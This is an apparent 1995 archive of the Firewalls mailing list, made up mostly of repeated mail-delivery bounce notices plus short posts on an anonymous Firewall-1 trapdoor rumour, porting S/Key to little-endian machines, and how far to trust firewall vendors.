SMTP id TAA04233 for ; Thu, 7 Sep 1995 19:15:08 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id jy20010; 7 Sep 95 19:29 EDT Received: by ncrgw1.ATTGIS.COM; 5 Sep 95 02:44:03 EDT Received: by ncrhub4.ATTGIS.COM; 5 Sep 95 02:43:55 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 5 Sep 95 02:54:37 EDT Subject: MMUG mail warning Date: Tue, 5 Sep 95 02:44:00 EDT Message-ID: <9509071929.jy20010@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 15:50:40 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 15:35:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 15:35:21 EDT Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzfir13657; Fri, 1 Sep 1995 15:27:33 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09371 for firewalls-digest-outgoing; Fri, 1 Sep 1995 11:37:45 -0700 Date: Fri, 1 Sep 1995 11:37:45 -0700 Message-Id: <199509011837.LAA09371@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #511 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 511 In this issue: Re: HannaH from SecureWare Inc. Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: FW: Programming Re: HannaH from SecureWare Inc. Security Paradigms (was HannaH) Firewall Requirements Document Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary flynn Date: Fri, 1 Sep 1995 10:00:21 -0400 Subject: Re: HannaH from SecureWare Inc. > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > [...] > > It seems so simple that someone else would have thought of it sooner. > From firewalls-owner Thu Sep 7 22:00:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA07138 for firewalls-outgoing; Thu, 7 Sep 1995 21:42:56 -0700 Received: from nda.nda.com (fw1.nda.COM [204.57.47.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA07131 for ; Thu, 7 Sep 1995 21:42:54 -0700 Received: (kovar@localhost) by nda.nda.com (8.6.11/8.6.4) id AAA29335; Fri, 8 Sep 1995 00:41:25 -0400 From: David Kovar Message-Id: <199509080441.AAA29335@nda.nda.com> Subject: Re: Firewall-1 concerns To: nobody@REPLAY.COM (Anonymous) Date: Fri, 8 Sep 1995 00:41:25 -0400 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> from "Anonymous" at Sep 7, 95 11:40:07 pm X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 379 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It turns out that Sun does not have the source and hasn't inspected it. > hope that the US military and other sensitive agencies or companies > with sensitive information aren't using this product for protection. > > It may be that the Masad has free reign to get into you network! > > Someone very concerned Someone seriously without a clue, is more like it. -David From firewalls-owner Thu Sep 7 22:30:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07802 for firewalls-outgoing; Thu, 7 Sep 1995 22:17:35 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA07795 for ; Thu, 7 Sep 1995 22:17:31 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id fn18331; 7 Sep 95 18:38 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 02:51:11 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 02:51:05 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 02:53:36 EDT Subject: MMUG mail warning Date: Sun, 3 Sep 95 02:51:00 EDT Message-ID: <9509071838.fn18331@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 15:50:40 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 15:35:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 15:35:21 EDT Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzfir13657; Fri, 1 Sep 1995 15:27:33 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09371 for firewalls-digest-outgoing; Fri, 1 Sep 1995 11:37:45 -0700 Date: Fri, 1 Sep 1995 11:37:45 -0700 Message-Id: <199509011837.LAA09371@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #511 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 511 In this issue: Re: HannaH from SecureWare Inc. Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: FW: Programming Re: HannaH from SecureWare Inc. Security Paradigms (was HannaH) Firewall Requirements Document Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary flynn Date: Fri, 1 Sep 1995 10:00:21 -0400 Subject: Re: HannaH from SecureWare Inc. > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > [...] > > It seems so simple that someone else would have thought of it sooner. > From firewalls-owner Thu Sep 7 22:32:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA07861 for firewalls-outgoing; Thu, 7 Sep 1995 22:20:55 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA07854 for ; Thu, 7 Sep 1995 22:20:52 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id bl18432; 7 Sep 95 18:40 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 02:56:56 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 02:55:45 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 02:57:28 EDT Subject: MMUG mail warning Date: Sun, 3 Sep 95 02:56:00 EDT Message-ID: <9509071840.bl18432@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 23:09:56 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 22:55:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 22:55:12 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfju15345; Fri, 1 Sep 1995 22:31:37 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29960 for firewalls-digest-outgoing; Fri, 1 Sep 1995 19:03:40 -0700 Date: Fri, 1 Sep 1995 19:03:40 -0700 Message-Id: <199509020203.TAA29960@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #512 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 512 In this issue: Re: Security Paradigms (was HannaH) Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Use of Remote Authentication: tacacs/radius/etc... Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Placement of WWW Server - any thoughts? Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. how to close socket Re: HannaH from SecureWare Inc. Re: DNS forwarding problem linux vs. *bsd for secure networking system Re: DNS forwarding problem snprintf() See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary@habanero.jmu.edu Date: Fri, 1 Sep 95 14:08:10 -0400 Subject: Re: Security Paradigms (was HannaH) > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. We do not have the resources, or the time, or the "lost From firewalls-owner Fri Sep 8 00:34:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09967 for firewalls-outgoing; Fri, 8 Sep 1995 00:20:59 -0700 Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA09958 for ; Fri, 8 Sep 1995 00:20:55 -0700 Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id QAA14019; Fri, 8 Sep 1995 16:17:25 +0900 Date: Fri, 8 Sep 1995 16:17:25 +0900 From: Chiaki Ishikawa Message-Id: <199509080717.QAA14019@gate.personal-media.co.jp> To: Firewalls@GreatCircle.Com Subject: S/Key for little endian machine Reply-to: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 3958 Hello, a while ago, someone posted that a version of S/Key that runs correctly on little-endian machine such as Intel x86 CPU was available on Australian site. I found that the link to that site is very slow and the greeting message of ftp suggested that I might try other site before downloading it from there. In order to be nice to the Australian users, I am looking for a site in USA or possibly in Europe that has the same/similar S/Key source file. Anyone? This is the original mesage: From: "Daniel O'Callaghan" Date: Thu, 29 Jun 1995 09:32:29 +1000 (EST) Subject: Re: Has Skey been ported to Linux. On Wed, 28 Jun 1995, Paul Osterwald wrote: > I would appreciate this information as well. Try ftp.austin.unimelb.edu.au:/pub/Security skey built fine except that the endian-ness was wrong. I added the right flag for endian-ness. Danny -- Chiaki Ishikawa ishikawa@personal-media.co.jp Personal Media Corp. Shinagawa, Tokyo, Japan 141 From firewalls-owner Fri Sep 8 00:34:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09981 for firewalls-outgoing; Fri, 8 Sep 1995 00:23:35 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09974 for ; Fri, 8 Sep 1995 00:23:31 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id ez19031; 7 Sep 95 18:55 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 02:58:27 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 02:57:52 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 02:55:56 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 02:58:00 EDT Message-ID: <9509071855.ez19031@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 15:50:40 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 15:35:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 15:35:21 EDT Received: from miles.greatcircle.com by relay2.UU.NET with ESMTP id QQzfir13657; Fri, 1 Sep 1995 15:27:33 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09371 for firewalls-digest-outgoing; Fri, 1 Sep 1995 11:37:45 -0700 Date: Fri, 1 Sep 1995 11:37:45 -0700 Message-Id: <199509011837.LAA09371@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #511 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 511 In this issue: Re: HannaH from SecureWare Inc. Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: FW: Programming Re: HannaH from SecureWare Inc. Security Paradigms (was HannaH) Firewall Requirements Document Re: comparison study between DES and RSA Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary flynn Date: Fri, 1 Sep 1995 10:00:21 -0400 Subject: Re: HannaH from SecureWare Inc. > > > This Hannah product looks like what I've been looking for. It puts > > "network security" where it belongs...on the nodes. I liken this > [...] > > It seems so simple that someone else would have thought of it sooner. > From firewalls-owner Fri Sep 8 01:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09991 for firewalls-outgoing; Fri, 8 Sep 1995 00:29:38 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id AAA09984 for ; Fri, 8 Sep 1995 00:29:35 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id bm19077; 7 Sep 95 18:57 EDT Received: by ncrgw1.ATTGIS.COM; 4 Sep 95 03:04:44 EDT Received: by ncrhub4.ATTGIS.COM; 4 Sep 95 03:04:17 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 4 Sep 95 03:00:33 EDT Subject: MMUG mail warning Date: Mon, 4 Sep 95 03:04:00 EDT Message-ID: <9509071857.bm19077@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 1 Sep 95 23:09:56 EDT Received: by ncrhub4.ATTGIS.COM; 1 Sep 95 22:55:41 EDT Received: by ncrgw1.ATTGIS.COM; 1 Sep 95 22:55:12 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfju15345; Fri, 1 Sep 1995 22:31:37 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29960 for firewalls-digest-outgoing; Fri, 1 Sep 1995 19:03:40 -0700 Date: Fri, 1 Sep 1995 19:03:40 -0700 Message-Id: <199509020203.TAA29960@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #512 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Friday, 1 September 1995 Volume 04 : Number 512 In this issue: Re: Security Paradigms (was HannaH) Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Use of Remote Authentication: tacacs/radius/etc... Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. Re: Placement of WWW Server - any thoughts? Re: HannaH from SecureWare Inc. Re: HannaH from SecureWare Inc. how to close socket Re: HannaH from SecureWare Inc. Re: DNS forwarding problem linux vs. *bsd for secure networking system Re: DNS forwarding problem snprintf() See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: gary@habanero.jmu.edu Date: Fri, 1 Sep 95 14:08:10 -0400 Subject: Re: Security Paradigms (was HannaH) > These people are not "trained", like Topsy they "just happen". WE CANNOT AFFORD > TO TRAIN THEM. We do not have the resources, or the time, or the "lost From firewalls-owner Fri Sep 8 02:00:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA12930 for firewalls-outgoing; Fri, 8 Sep 1995 01:35:40 -0700 Received: from gatepas.gc.ca (gatepas.gc.ca [192.197.79.133]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA12923 for ; Fri, 8 Sep 1995 01:35:33 -0700 Reply-To: Peter.BEAN@ldn01.x400.gc.ca Date: Fri, 08 Sep 1995 08:20:02 +0000 Priority: normal Content-Identifier: OLIVETTI-MAIL3.0 X400-Content-Type: P2-1984 X400-MTS-Identifier: [/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/;995:950908082002] From: Peter.BEAN@ldn01.x400.gc.ca (BEAN Peter -LDN -AG -LES) To: Firewalls@GreatCircle.COM Subject: Firewalls-Digest V4 #517 Message-Id: <995*/G=Peter/S=BEAN/O=ldn.01/PRMD=gc+eaitc.aecec/ADMD=telecom.canada/C=ca/@MHS> Importance: normal In-Reply-To: <199509080735.AAA10119*/DD.RFC-822=miles.greatcircle.com/PRMD=gc+internet/ADMD=GOVMT.CANADA/C=CA/@MHS> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am away from the office until Monday, 18 September 1995 From firewalls-owner Fri Sep 8 04:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA15055 for firewalls-outgoing; Fri, 8 Sep 1995 03:51:53 -0700 Received: from ncrhub1.ATTGIS.COM (h192-127-251-16.ATTGIS.COM [192.127.251.16]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA15047 for ; Fri, 8 Sep 1995 03:51:48 -0700 From: postmaster@uf9392uc.rockvillemd.NCR.COM Received: from ncrgw1 by ncrhub1.ATTGIS.COM id ew20580; 7 Sep 95 19:34 EDT Received: by ncrgw1.ATTGIS.COM; 5 Sep 95 03:12:56 EDT Received: by ncrhub4.ATTGIS.COM; 5 Sep 95 03:12:37 EDT Received: by uf9392uc.RockvilleMD.ncr.com; 5 Sep 95 03:04:17 EDT Subject: MMUG mail warning Date: Tue, 5 Sep 95 03:12:00 EDT Message-ID: <9509071934.ew20580@ncrhub1.ATTGIS.COM> Apparently-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your mail to peacew@uf9392p01.RockvilleMD.ncr.com is not yet delivered. Delivery attempts continue. ---------- diagnosis ---------- Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. Mail could not be delivered because of a temporary resource contention at the mail recipient's site. If the problem persists, contact your mail administrator. ---------- unsent mail ---------- Received: by uf9392uc.RockvilleMD.ncr.com; 3 Sep 95 01:48:58 EDT Received: by ncrhub4.ATTGIS.COM; 3 Sep 95 01:35:21 EDT Received: by ncrgw1.ATTGIS.COM; 3 Sep 95 01:35:11 EDT Received: from miles.greatcircle.com by relay1.UU.NET with ESMTP id QQzfnx19337; Sun, 3 Sep 1995 01:15:40 -0400 From: firewalls-digest-owner@GreatCircle.COM Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA24562 for firewalls-digest-outgoing; Sat, 2 Sep 1995 22:01:01 -0700 Date: Sat, 2 Sep 1995 22:01:01 -0700 Message-Id: <199509030501.WAA24562@miles.greatcircle.com> To: firewalls-digest@GreatCircle.COM Subject: Firewalls-Digest V4 #513 Reply-To: Firewalls@GreatCircle.COM Errors-To: firewalls-digest-owner@GreatCircle.COM Precedence: bulk Firewalls-Digest Saturday, 2 September 1995 Volume 04 : Number 513 In this issue: snprintf.c and SunOS 5.4 re: snprintf(), SMURF, & Jules Own Version... re: snprintf(), SMURF, & Jules Own Version... Subject: Re: using suns/sunos for gateway host(s) Re: FW: Programming Re: FW: Programming Re: Use of Remote Authentication: tacacs/radius/etc... Re: DNS forwarding problem Large-Mixed-OS FW access problem Re: HannaH from SecureWare Inc. RADIUS... Where is it? Large-Mixed-OS FW access problem Frame-Relay Net Connections See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: "Kenneth Kron" Date: 1 Sep 1995 19:24:39 -0800 Subject: snprintf.c and SunOS 5.4 Patrick, Thanks for the snprintf source, FYI -- In order to compile your snprintf on SunOS 5.4 I had to From firewalls-owner Fri Sep 8 04:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA15314 for firewalls-outgoing; Fri, 8 Sep 1995 04:09:09 -0700 Received: from gate.personal-media.co.jp (gate.personal-media.co.jp [202.33.97.65]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA15307 for ; Fri, 8 Sep 1995 04:09:05 -0700 Received: (from ishikawa@localhost) by gate.personal-media.co.jp (8.6.12+2.4W3/3.3W5-gate-mx) id UAA15419; Fri, 8 Sep 1995 20:05:30 +0900 Date: Fri, 8 Sep 1995 20:05:30 +0900 From: Chiaki Ishikawa Message-Id: <199509081105.UAA15419@gate.personal-media.co.jp> To: Firewalls@GreatCircle.COM In-reply-to: <199509080735.AAA10119@miles.greatcircle.com> (firewalls-digest-owner@GreatCircle.COM) Subject: Re: S/Key for little endian machine Reply-to: ishikawa@personal-media.co.jp Sender: firewalls-owner@GreatCircle.COM Precedence: bulk PMC e-mail id: 3966 Thanks to the direct response from Daniel O'Callaghan" , I found out that all I need to change the S/KEY behavior is to define MPU8086 in cc command line. (This will take care of the endian problem. There are other tweakings necessary for Solaris 2.4 for X86 on iApx86.) -- Chiaki Ishikawa ishikawa@personal-media.co.jp Personal Media Corp. Shinagawa, Tokyo, Japan 141 From firewalls-owner Fri Sep 8 05:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA16059 for firewalls-outgoing; Fri, 8 Sep 1995 04:51:14 -0700 Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA16052 for ; Fri, 8 Sep 1995 04:51:08 -0700 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id MAA02337 for ; Fri, 8 Sep 1995 12:26:11 +0100 Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id MAA22811; Fri, 8 Sep 1995 12:49:26 +0100 From: Danny Cox Date: Fri, 8 Sep 1995 12:45:48 +0100 Message-Id: <5290.9509081145@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: upgrade to commercial firewalls Cc: dannyc@gmap3 X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt; Fri, 8 Sep 1995 04:47:26 -0700 Received: by datasrv.co.il id AA25207 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Fri, 8 Sep 1995 13:45:48 +0300 Date: Fri, 8 Sep 1995 13:45:46 +0300 (IDT) From: ORMAT Subject: Re: Firewall-1 concerns To: firewalls@greatcircle.com In-Reply-To: <199509072140.XAA16451@utopia.hacktic.nl> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 7 Sep 1995, Anonymous wrote: [snip] > I'm afraid that companies may look at the Sun firewall-1 product and > think that Sun has inspected the code for trapdoor and such in the code > that may have put there under orders from the Masad.In fact, I heard > one person say that in looking at the binary there is very suspicious > code. > > It turns out that Sun does not have the source and hasn't inspected it. > hope that the US military and other sensitive agencies or companies > with sensitive information aren't using this product for protection. > > It may be that the Masad has free reign to get into you network! > > Someone very concerned > 1. It's Mosad and not Masad 2. I wish someone would tell me about all those conspiracies I'm supposed to be a part of. 3. The question here is a legit one, how can you trust a firewall when you don't know what the code looks like? 4. Posting from an anon account won't stop the Masad from finding you, and now that you've blown their cover, I guess they'll have to kill you. Arik From firewalls-owner Fri Sep 8 05:22:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA16135 for firewalls-outgoing; Fri, 8 Sep 1995 04:53:23 -0700 Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id EAA16128 for ; Fri, 8 Sep 1995 04:53:20 -0700 Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma026764; Fri Sep 8 07:50:34 1995 Posted-Date: Fri, 8 Sep 1995 07:51:17 -0400 From: "Bryan D. Boyle" Message-Id: <9509080751.ZM23272@maverick.erenj.com> Date: Fri, 8 Sep 1995 07:51:17 -0400 In-Reply-To: David Kovar "Re: Firewall-1 concerns" (Sep 8, 12:41am) References: <199509080441.AAA29335@nda.nda.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: Firewall-1 concerns Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 8, 12:41am, David Kovar wrote: > Someone seriously without a clue, is more like it. Oh? I think his questioning is a good sign of a healthy respect and paranoia about security and where your protection mechanism comes from. "Trust us, we know what YOU need" is a pile of bull cookies from a vendor. I don't know about you, but I don't believe ANYTHING a vendor tells me unless they are able to 1) independently substantiate their claims 2) prove that independent review of their processes, code, and mechanisms withstood all known and projected attacks 3) allow open and auditable review of their program 4) not claim all sorts of protocol 'extensions and modifications' to supposedly allow non-securable portocols to pass 'securely'. It protocol is either secure or it is not. Securing a corporate network is no place to beta test someone's extensions to a transmission protocol. 5) Work to fit their solution into MY operation, not force MY operation to modify its processes to fit their view of the world. I don't have to buy from a vendor; the converse is not necessarily the case. I call the shots here. Now, it may be a cultural thing, but the Firewall-1 folks seem to think we are a bunch of oafs here, wet behind the ears, based on my dealings with them. They have never been able to meet any of the tests (regardless of the pretty gui) above. They get defensive, not cooperative, when pushed to substantiate any of the above. It is not a crystal-box solution, it is a textbook example of a black box solution that you are not supposed to understand how it works, what the pitfalls are, or even question whether or not it works properly. We will not even begin to discuss the OS it runs on...which seems to be the ongoing topic of CERT alerts du jour. These are just my observations, and not a secret to the long-time list members. -- Bryan D. Boyle | "It's when you think you've understood a problem #include | throughly that you are in real trouble..." EMAIL: bdboyle@erenj.com | -Pavel Chichikov ---------------------------------- -------------------- From firewalls-owner Fri Sep 8 08:02:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19449 for firewalls-outgoing; Fri, 